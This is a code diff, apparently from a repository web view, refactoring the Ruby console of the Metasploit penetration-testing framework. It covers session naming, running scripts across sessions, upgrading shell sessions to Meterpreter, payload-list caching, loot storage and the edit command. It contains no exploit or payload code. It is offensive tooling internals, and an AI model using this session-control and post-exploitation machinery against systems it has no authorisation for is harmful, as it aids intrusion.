# Upload and exec to the specific command session
|
||||||
|
@ -1204,8 +1205,9 @@ class Core
|
||||||
if val.to_s =~ /^\d+$/
|
if val.to_s =~ /^\d+$/
|
||||||
response_timeout = val.to_i
|
response_timeout = val.to_i
|
||||||
end
|
end
|
||||||
when "-S", "--search"
|
when "-n", "--name"
|
||||||
search_term = val
|
method = 'name'
|
||||||
|
session_name = val
|
||||||
else
|
else
|
||||||
extra << val
|
extra << val
|
||||||
end
|
end
|
||||||
|
@ -1387,15 +1389,11 @@ class Core
|
||||||
sid = nil
|
sid = nil
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
when 'scriptall'
|
when 'script'
|
||||||
unless script
|
unless script
|
||||||
print_error("No script specified!")
|
print_error("No script or module specified!")
|
||||||
return false
|
return false
|
||||||
end
|
end
|
||||||
script_paths = {}
|
|
||||||
script_paths['meterpreter'] = Msf::Sessions::Meterpreter.find_script_path(script)
|
|
||||||
script_paths['shell'] = Msf::Sessions::CommandShell.find_script_path(script)
|
|
||||||
|
|
||||||
sessions = sid ? session_list : framework.sessions.keys.sort
|
sessions = sid ? session_list : framework.sessions.keys.sort
|
||||||
|
|
||||||
sessions.each do |sess_id|
|
sessions.each do |sess_id|
|
||||||
|
@ -1411,15 +1409,13 @@ class Core
|
||||||
session.response_timeout = response_timeout
|
session.response_timeout = response_timeout
|
||||||
end
|
end
|
||||||
begin
|
begin
|
||||||
if script_paths[session.type]
|
print_status("Session #{sess_id} (#{session.session_host}):")
|
||||||
print_status("Session #{sess_id} (#{session.session_host}):")
|
print_status("Running #{script} on #{session.type} session" +
|
||||||
print_status("Running script #{script} on #{session.type} session" +
|
" #{sess_id} (#{session.session_host})")
|
||||||
" #{sess_id} (#{session.session_host})")
|
begin
|
||||||
begin
|
session.execute_script(script, *extra)
|
||||||
session.execute_file(script_paths[session.type], extra)
|
rescue ::Exception => e
|
||||||
rescue ::Exception => e
|
log_error("Error executing script or module: #{e.class} #{e}")
|
||||||
log_error("Error executing script: #{e.class} #{e}")
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
ensure
|
ensure
|
||||||
if session.respond_to?(:response_timeout) && last_known_timeout
|
if session.respond_to?(:response_timeout) && last_known_timeout
|
||||||
|
@ -1441,14 +1437,9 @@ class Core
|
||||||
session.response_timeout = response_timeout
|
session.response_timeout = response_timeout
|
||||||
end
|
end
|
||||||
begin
|
begin
|
||||||
if ['shell', 'powershell'].include?(session.type)
|
session.init_ui(driver.input, driver.output)
|
||||||
session.init_ui(driver.input, driver.output)
|
session.execute_script('post/multi/manage/shell_to_meterpreter')
|
||||||
session.execute_script('post/multi/manage/shell_to_meterpreter')
|
session.reset_ui
|
||||||
session.reset_ui
|
|
||||||
else
|
|
||||||
print_error("Session #{sess_id} is not a command shell session, it is #{session.type}, skipping...")
|
|
||||||
next
|
|
||||||
end
|
|
||||||
ensure
|
ensure
|
||||||
if session.respond_to?(:response_timeout) && last_known_timeout
|
if session.respond_to?(:response_timeout) && last_known_timeout
|
||||||
session.response_timeout = last_known_timeout
|
session.response_timeout = last_known_timeout
|
||||||
|
@ -1473,6 +1464,27 @@ class Core
|
||||||
print_line
|
print_line
|
||||||
print(Serializer::ReadableText.dump_sessions(framework, :show_extended => show_extended, :verbose => verbose, :search_term => search_term))
|
print(Serializer::ReadableText.dump_sessions(framework, :show_extended => show_extended, :verbose => verbose, :search_term => search_term))
|
||||||
print_line
|
print_line
|
||||||
|
when 'name'
|
||||||
|
if session_name.blank?
|
||||||
|
print_error('Please specify a valid session name')
|
||||||
|
return false
|
||||||
|
end
|
||||||
|
|
||||||
|
sessions = sid ? session_list : nil
|
||||||
|
|
||||||
|
if sessions.nil? || sessions.empty?
|
||||||
|
print_error("Please specify valid session identifier(s) using -i")
|
||||||
|
return false
|
||||||
|
end
|
||||||
|
|
||||||
|
sessions.each do |s|
|
||||||
|
if framework.sessions[s].respond_to?(:name=)
|
||||||
|
framework.sessions[s].name = session_name
|
||||||
|
print_status("Session #{s} named to #{session_name}")
|
||||||
|
else
|
||||||
|
print_error("Session #{s} cannot be named")
|
||||||
|
end
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
rescue IOError, EOFError, Rex::StreamClosedError
|
rescue IOError, EOFError, Rex::StreamClosedError
|
||||||
|
@ -1603,12 +1615,6 @@ class Core
|
||||||
# Set the supplied name to the supplied value
|
# Set the supplied name to the supplied value
|
||||||
name = args[0]
|
name = args[0]
|
||||||
value = args[1, args.length-1].join(' ')
|
value = args[1, args.length-1].join(' ')
|
||||||
if (name.upcase == "TARGET")
|
|
||||||
# Different targets can have different architectures and platforms
|
|
||||||
# so we need to rebuild the payload list whenever the target
|
|
||||||
# changes.
|
|
||||||
@cache_payloads = nil
|
|
||||||
end
|
|
||||||
|
|
||||||
# If the driver indicates that the value is not valid, bust out.
|
# If the driver indicates that the value is not valid, bust out.
|
||||||
if (driver.on_variable_set(global, name, value) == false)
|
if (driver.on_variable_set(global, name, value) == false)
|
||||||
|
@ -2264,11 +2270,16 @@ class Core
|
||||||
# Provide valid payload options for the current exploit
|
# Provide valid payload options for the current exploit
|
||||||
#
|
#
|
||||||
def option_values_payloads
|
def option_values_payloads
|
||||||
return @cache_payloads if @cache_payloads
|
if @cache_payloads && active_module == @previous_module && active_module.target == @previous_target
|
||||||
|
return @cache_payloads
|
||||||
|
end
|
||||||
|
|
||||||
@cache_payloads = active_module.compatible_payloads.map { |refname, payload|
|
@previous_module = active_module
|
||||||
|
@previous_target = active_module.target
|
||||||
|
|
||||||
|
@cache_payloads = active_module.compatible_payloads.map do |refname, payload|
|
||||||
refname
|
refname
|
||||||
}
|
end
|
||||||
|
|
||||||
@cache_payloads
|
@cache_payloads
|
||||||
end
|
end
|
||||||
|
|
|
@ -479,7 +479,7 @@ class Db
|
||||||
'SortIndex' => order_by
|
'SortIndex' => order_by
|
||||||
})
|
})
|
||||||
|
|
||||||
# Sentinal value meaning all
|
# Sentinel value meaning all
|
||||||
host_ranges.push(nil) if host_ranges.empty?
|
host_ranges.push(nil) if host_ranges.empty?
|
||||||
|
|
||||||
case
|
case
|
||||||
|
@ -717,7 +717,7 @@ class Db
|
||||||
'SortIndex' => order_by
|
'SortIndex' => order_by
|
||||||
})
|
})
|
||||||
|
|
||||||
# Sentinal value meaning all
|
# Sentinel value meaning all
|
||||||
host_ranges.push(nil) if host_ranges.empty?
|
host_ranges.push(nil) if host_ranges.empty?
|
||||||
ports = nil if ports.empty?
|
ports = nil if ports.empty?
|
||||||
|
|
||||||
|
@ -1115,7 +1115,7 @@ class Db
|
||||||
def cmd_loot_help
|
def cmd_loot_help
|
||||||
print_line "Usage: loot <options>"
|
print_line "Usage: loot <options>"
|
||||||
print_line " Info: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]"
|
print_line " Info: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]"
|
||||||
print_line " Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] [-t [type]"
|
print_line " Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] -t [type]"
|
||||||
print_line " Del: loot -d [addr1 addr2 ...]"
|
print_line " Del: loot -d [addr1 addr2 ...]"
|
||||||
print_line
|
print_line
|
||||||
print_line " -a,--add Add loot to the list of addresses, instead of listing"
|
print_line " -a,--add Add loot to the list of addresses, instead of listing"
|
||||||
|
@ -1187,34 +1187,38 @@ class Db
|
||||||
'Columns' => [ 'host', 'service', 'type', 'name', 'content', 'info', 'path' ],
|
'Columns' => [ 'host', 'service', 'type', 'name', 'content', 'info', 'path' ],
|
||||||
})
|
})
|
||||||
|
|
||||||
# Sentinal value meaning all
|
# Sentinel value meaning all
|
||||||
host_ranges.push(nil) if host_ranges.empty?
|
host_ranges.push(nil) if host_ranges.empty?
|
||||||
|
|
||||||
if mode == :add
|
if mode == :add
|
||||||
if info.nil?
|
if host_ranges.compact.empty?
|
||||||
print_error("Info required")
|
print_error('Address list required')
|
||||||
return
|
return
|
||||||
end
|
|
||||||
if filename.nil?
|
|
||||||
print_error("Loot file required")
|
|
||||||
return
|
|
||||||
end
|
|
||||||
if types.nil? or types.size != 1
|
|
||||||
print_error("Exactly one loot type is required")
|
|
||||||
return
|
|
||||||
end
|
|
||||||
type = types.first
|
|
||||||
name = File.basename(filename)
|
|
||||||
host_ranges.each do |range|
|
|
||||||
range.each do |host|
|
|
||||||
file = File.open(filename, "rb")
|
|
||||||
contents = file.read
|
|
||||||
lootfile = framework.db.find_or_create_loot(:type => type, :host => host, :info => info, :data => contents, :path => filename, :name => name)
|
|
||||||
print_status("Added loot for #{host} (#{lootfile})")
|
|
||||||
end
|
end
|
||||||
|
if info.nil?
|
||||||
|
print_error("Info required")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
if filename.nil?
|
||||||
|
print_error("Loot file required")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
if types.nil? or types.size != 1
|
||||||
|
print_error("Exactly one loot type is required")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
type = types.first
|
||||||
|
name = File.basename(filename)
|
||||||
|
file = File.open(filename, "rb")
|
||||||
|
contents = file.read
|
||||||
|
host_ranges.each do |range|
|
||||||
|
range.each do |host|
|
||||||
|
lootfile = framework.db.find_or_create_loot(:type => type, :host => host, :info => info, :data => contents, :path => filename, :name => name)
|
||||||
|
print_status("Added loot for #{host} (#{lootfile})")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
return
|
||||||
end
|
end
|
||||||
return
|
|
||||||
end
|
|
||||||
|
|
||||||
each_host_range_chunk(host_ranges) do |host_search|
|
each_host_range_chunk(host_ranges) do |host_search|
|
||||||
framework.db.hosts(framework.db.workspace, false, host_search).each do |host|
|
framework.db.hosts(framework.db.workspace, false, host_search).each do |host|
|
||||||
|
|
|
@ -26,7 +26,7 @@ module Msf
|
||||||
def commands
|
def commands
|
||||||
{
|
{
|
||||||
"back" => "Move back from the current context",
|
"back" => "Move back from the current context",
|
||||||
"edit" => "Edit the current module with the preferred editor",
|
"edit" => "Edit the current module or a file with the preferred editor",
|
||||||
"advanced" => "Displays advanced options for one or more modules",
|
"advanced" => "Displays advanced options for one or more modules",
|
||||||
"info" => "Displays information about one or more modules",
|
"info" => "Displays information about one or more modules",
|
||||||
"options" => "Displays global options or for one or more modules",
|
"options" => "Displays global options or for one or more modules",
|
||||||
|
@ -48,7 +48,6 @@ module Msf
|
||||||
super
|
super
|
||||||
|
|
||||||
@dscache = {}
|
@dscache = {}
|
||||||
@cache_payloads = nil
|
|
||||||
@previous_module = nil
|
@previous_module = nil
|
||||||
@module_name_stack = []
|
@module_name_stack = []
|
||||||
@dangerzone_map = nil
|
@dangerzone_map = nil
|
||||||
|
@ -66,22 +65,26 @@ module Msf
|
||||||
end
|
end
|
||||||
|
|
||||||
def cmd_edit_help
|
def cmd_edit_help
|
||||||
msg = "Edit the currently active module"
|
print_line "Usage: edit [file/to/edit.rb]"
|
||||||
msg = "#{msg} #{local_editor ? "with #{local_editor}" : "(LocalEditor or $VISUAL/$EDITOR should be set first)"}."
|
|
||||||
print_line "Usage: edit"
|
|
||||||
print_line
|
print_line
|
||||||
print_line msg
|
print_line "Edit the currently active module or a local file with #{local_editor}."
|
||||||
print_line "When done editing, you must reload the module with 'reload' or 'rerun'."
|
print_line "If a file path is specified, it will automatically be reloaded after editing."
|
||||||
|
print_line "Otherwise, you can reload the active module with 'reload' or 'rerun'."
|
||||||
print_line
|
print_line
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Edit the currently active module
|
# Edit the currently active module or a local file
|
||||||
#
|
#
|
||||||
def cmd_edit
|
def cmd_edit(*args)
|
||||||
if active_module
|
if args.length > 0
|
||||||
|
path = args[0]
|
||||||
|
elsif active_module
|
||||||
|
path = active_module.file_path
|
||||||
|
end
|
||||||
|
|
||||||
|
if path
|
||||||
editor = local_editor
|
editor = local_editor
|
||||||
path = active_module.file_path
|
|
||||||
|
|
||||||
if editor.nil?
|
if editor.nil?
|
||||||
editor = 'vim'
|
editor = 'vim'
|
||||||
|
@ -90,11 +93,26 @@ module Msf
|
||||||
|
|
||||||
print_status("Launching #{editor} #{path}")
|
print_status("Launching #{editor} #{path}")
|
||||||
system(editor, path)
|
system(editor, path)
|
||||||
|
|
||||||
|
# XXX: This will try to reload *any* .rb and break on modules
|
||||||
|
if args.length > 0 && path.end_with?('.rb')
|
||||||
|
print_status("Reloading #{path}")
|
||||||
|
load path
|
||||||
|
else
|
||||||
|
print_error('Only Ruby files can be reloaded')
|
||||||
|
end
|
||||||
else
|
else
|
||||||
print_error('Nothing to edit -- try using a module first.')
|
print_error('Nothing to edit -- try using a module first.')
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Tab completion for the edit command
|
||||||
|
#
|
||||||
|
def cmd_edit_tabs(str, words)
|
||||||
|
tab_complete_filenames(str, words)
|
||||||
|
end
|
||||||
|
|
||||||
def cmd_advanced_help
|
def cmd_advanced_help
|
||||||
print_line 'Usage: advanced [mod1 mod2 ...]'
|
print_line 'Usage: advanced [mod1 mod2 ...]'
|
||||||
print_line
|
print_line
|
||||||
|
@ -638,7 +656,6 @@ module Msf
|
||||||
active_module.datastore.update(@dscache[active_module.fullname])
|
active_module.datastore.update(@dscache[active_module.fullname])
|
||||||
end
|
end
|
||||||
|
|
||||||
@cache_payloads = nil
|
|
||||||
mod.init_ui(driver.input, driver.output)
|
mod.init_ui(driver.input, driver.output)
|
||||||
|
|
||||||
# Update the command prompt
|
# Update the command prompt
|
||||||
|
|
|
@ -59,8 +59,8 @@ module Msf
|
||||||
elsif
|
elsif
|
||||||
# let's check to see if it's in the scripts/resource dir (like when tab completed)
|
# let's check to see if it's in the scripts/resource dir (like when tab completed)
|
||||||
[
|
[
|
||||||
::Msf::Config.script_directory + ::File::SEPARATOR + "resource",
|
::Msf::Config.script_directory + ::File::SEPARATOR + 'resource',
|
||||||
::Msf::Config.user_script_directory + ::File::SEPARATOR + "resource"
|
::Msf::Config.user_script_directory + ::File::SEPARATOR + 'resource'
|
||||||
].each do |dir|
|
].each do |dir|
|
||||||
res_path = dir + ::File::SEPARATOR + res
|
res_path = dir + ::File::SEPARATOR + res
|
||||||
if ::File.exist?(res_path)
|
if ::File.exist?(res_path)
|
||||||
|
@ -97,7 +97,7 @@ module Msf
|
||||||
[
|
[
|
||||||
::Msf::Config.script_directory + File::SEPARATOR + "resource",
|
::Msf::Config.script_directory + File::SEPARATOR + "resource",
|
||||||
::Msf::Config.user_script_directory + File::SEPARATOR + "resource",
|
::Msf::Config.user_script_directory + File::SEPARATOR + "resource",
|
||||||
"."
|
'.'
|
||||||
].each do |dir|
|
].each do |dir|
|
||||||
next if not ::File.exist? dir
|
next if not ::File.exist? dir
|
||||||
tabs += ::Dir.new(dir).find_all { |e|
|
tabs += ::Dir.new(dir).find_all { |e|
|
||||||
|
|
|
@ -593,7 +593,7 @@ class Driver < Msf::Ui::Driver
|
||||||
when "prompt"
|
when "prompt"
|
||||||
update_prompt(val, framework.datastore['PromptChar'] || DefaultPromptChar, true)
|
update_prompt(val, framework.datastore['PromptChar'] || DefaultPromptChar, true)
|
||||||
when "promptchar"
|
when "promptchar"
|
||||||
update_prompt(framework.datastore['Prompt'], val, true)
|
update_prompt(framework.datastore['Prompt'] || DefaultPrompt, val, true)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue